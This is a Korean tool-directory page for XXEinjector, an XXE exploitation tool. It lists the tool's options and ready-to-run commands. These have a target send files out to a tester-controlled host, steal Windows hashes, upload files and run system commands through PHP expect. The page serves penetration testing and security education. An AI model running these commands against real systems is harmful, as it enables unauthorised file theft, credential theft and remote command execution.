Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
XXEinjector — 직접적인 방식과 다양한 Out-of-Band 방식을 사용하는 XXE 취약점 자동 익스플로잇 도구. | Kitploit
도구/GitHubGitHub/enjoiz/xxeinjector
Vulnerability ScannersExploitationWeb Application ExploitationPenetration Testing
GitHubenjoiz/xxeinjector

XXEinjector

직접적인 방식과 다양한 Out-of-Band 방식을 사용하는 XXE 취약점 자동 익스플로잇 도구.

저장소 보기
1.8k3251년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

XXEinjector

XXEinjector는 직접 및 대역 외 방식을 사용하여 파일 검색을 자동화합니다. 디렉터리 목록은 Java 애플리케이션에서만 작동합니다. 다른 애플리케이션의 경우 무차별 대입 방식을 사용해야 합니다.

옵션:

root@kitploit:~
  --host	    필수 - 역방향 연결을 위한 우리의 IP 주소. (--host=192.168.0.2)
  --file	    필수 - XML이 포함된 유효한 HTTP 요청이 들어 있는 파일. DTD가 삽입되어야 할 지점을 "XXEINJECT"로 표시할 수도 있습니다. (--file=/tmp/req.txt)
  --path	    디렉터리를 열거할 때 필수 - 열거할 경로. (--path=/etc)
  --brute	    파일을 무차별 대입할 때 필수 - 무차별 대입할 경로가 있는 파일. (--brute=/tmp/brute.txt)
  --logger	    결과만 기록합니다. 요청을 보내지 않습니다. HTTP 로거는 결과를 위해 "p" 매개변수를 찾습니다.
  
  --rhost	    원격 호스트의 IP 주소 또는 도메인 이름. Host 헤더가 없는 요청에만 이 인수를 사용하십시오. (--rhost=192.168.0.3)
  --rport	    원격 호스트의 TCP 포트. Host 헤더가 없고 기본값이 아닌 요청에만 이 인수를 사용하십시오. (--rport=8080)

  --oob		    대역 외 공격 방법. FTP가 기본값입니다. FTP는 모든 애플리케이션에서 사용할 수 있습니다. HTTP는 Java < 1.7 애플리케이션의 디렉터리 목록을 통한 무차별 대입 및 열거에 사용할 수 있습니다. Gopher는 Java < 1.7 애플리케이션에서만 사용할 수 있습니다. (--oob=http/ftp/gopher)
  --direct	    대역 외 대신 직접 공격을 사용합니다. 이 인수의 값으로 고유 마커를 지정해야 합니다. 이 마커는 XXE 결과의 시작과 끝을 지정합니다. --direct-xml을 지정하여 요청 파일에서 XML이 어떻게 보여야 하는지 확인하거나, 공격 중에 로컬 DTD를 사용하려면 --localdtd-xml을 지정하십시오. 응답에서 출력 데이터 전후에 특수 문자가 있을 때 시작 및 끝 마커에 문제가 있는 경우 Burp Proxy 일치 및 바꾸기 옵션을 사용하여 대체하십시오. (--direct=UNIQUEMARKSTART,UNIQUEMARKEND)
  --cdata	    CDATA로 직접 공격을 개선합니다. 데이터는 직접 검색되지만 CDATA 페이로드를 구성하는 데 OOB가 사용됩니다. 이 기술에서 요청이 어떻게 보여야 하는지 확인하려면 --cdata-xml을 지정하십시오.
  --2ndfile	    이차 공격에 사용되는 유효한 HTTP 요청이 포함된 파일. (--2ndfile=/tmp/2ndreq.txt)
  --phpfilter	PHP 필터를 사용하여 대상 파일을 전송 전에 base64로 인코딩합니다.
  --netdoc      파일 대신 netdoc 프로토콜을 사용합니다(Java).
  --enumports	역방향 연결을 위해 필터링되지 않은 포트를 열거합니다. 모든 TCP 포트를 열거하려면 "all" 값을 지정하십시오. (--enumports=21,22,80,443,445)

  --hashes	    애플리케이션을 실행하는 사용자의 Windows 해시를 탈취합니다.
  --expect	    PHP expect 확장을 사용하여 임의의 시스템 명령을 실행합니다. HTTP 및 PHP 필터와 가장 잘 작동합니다. (--expect=ls)
  --upload	    Java jar 스키마를 사용하여 지정된 파일을 임시 파일에 업로드합니다. (--upload=/tmp/upload.txt)
  --xslt	    XSLT 삽입을 테스트합니다.

  --ssl		    SSL을 사용합니다.
  --proxy	    사용할 프록시. (--proxy=127.0.0.1:8080)
  --httpport	사용자 정의 HTTP 포트를 설정합니다. (--httpport=80)
  --ftpport	    사용자 정의 FTP 포트를 설정합니다. (--ftpport=21)
  --gopherport	사용자 정의 Gopher 포트를 설정합니다. (--gopherport=70)
  --jarport	    jar를 사용하여 파일을 업로드하기 위한 사용자 정의 포트를 설정합니다. (--jarport=1337)
  --xsltport	XSLT 삽입 테스트를 위한 사용자 정의 포트를 설정합니다. (--xsltport=1337)

  --test	    이 모드는 삽입된 페이로드와 함께 요청을 표시하고 종료합니다. 서버에 보내지 않고 요청의 정확성을 확인하는 데 사용됩니다.
  --urlencode	삽입된 DTD를 URL 인코딩합니다. URI의 기본값입니다.
  --nodtd	    DTD를 요청에 직접 넣고 싶은 경우. DTD가 어떻게 보여야 하는지 보려면 "--oob-xml"을 지정하십시오.
  --output	    무차별 대입 및 로거 모드의 출력 파일. 기본적으로 현재 디렉토리의 brute.log에 기록합니다. (--output=/tmp/out.txt)
  --timeout	    파일/디렉터리 내용을 수신하기 위한 타임아웃. (--timeout=20)
  --contimeout	서버와의 연결 종료 타임아웃. DoS 상황을 방지하는 데 사용됩니다. (--contimeout=20)
  --fast	    열거할 항목을 묻는 것을 건너뜁니다. 거짓 양성에 취약합니다.
  --verbose	    상세 메시지를 표시합니다.

사용 예시:

root@kitploit:~
  HTTPS 애플리케이션에서 /etc 디렉터리 열거:
  ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl
  OOB 방법을 위해 gopher를 사용하여 /etc 디렉터리 열거:
  ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher
  이차 공격:
  ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt
  HTTP 대역 외 방법과 netdoc 프로토콜을 사용한 파일 무차별 대입:
  ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc
  직접 공격을 사용한 열거:
  ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARKSTART,UNIQUEMARKEND
  필터링되지 않은 포트 열거:
  ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all
  Windows 해시 탈취:
  ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes
  Java jar를 사용한 파일 업로드:
  ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf
  PHP expect를 사용한 시스템 명령 실행:
  ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls
  XSLT 삽입 테스트:
  ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt
  요청만 기록:
  ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt

면책 조항

이 저장소에는 교육 목적으로만 개발된 도구가 포함되어 있습니다. 불법 활동에 도구를 오용하는 것은 엄격히 금지됩니다.

법적 고지

사이버 보안 및 윤리적 해킹과 관련된 모든 현지 법률 및 규정을 이해하고 준수하는 것이 중요합니다. 컴퓨터 시스템, 네트워크 또는 데이터에 대한 무단 액세스는 불법이며 법적 처벌을 받을 수 있습니다. 이 저장소의 개발자는 여기에 포함된 도구의 오용에 대해 책임을 지지 않습니다.

이 저장소의 도구를 사용함으로써 귀하는 이를 책임감 있고 윤리적으로 사용하는 데 동의합니다. 귀하의 것이 아닌 네트워크, 시스템 또는 데이터를 테스트하거나 액세스하려고 시도하기 전에 항상 명시적 허가를 받으십시오.

도구 다운로드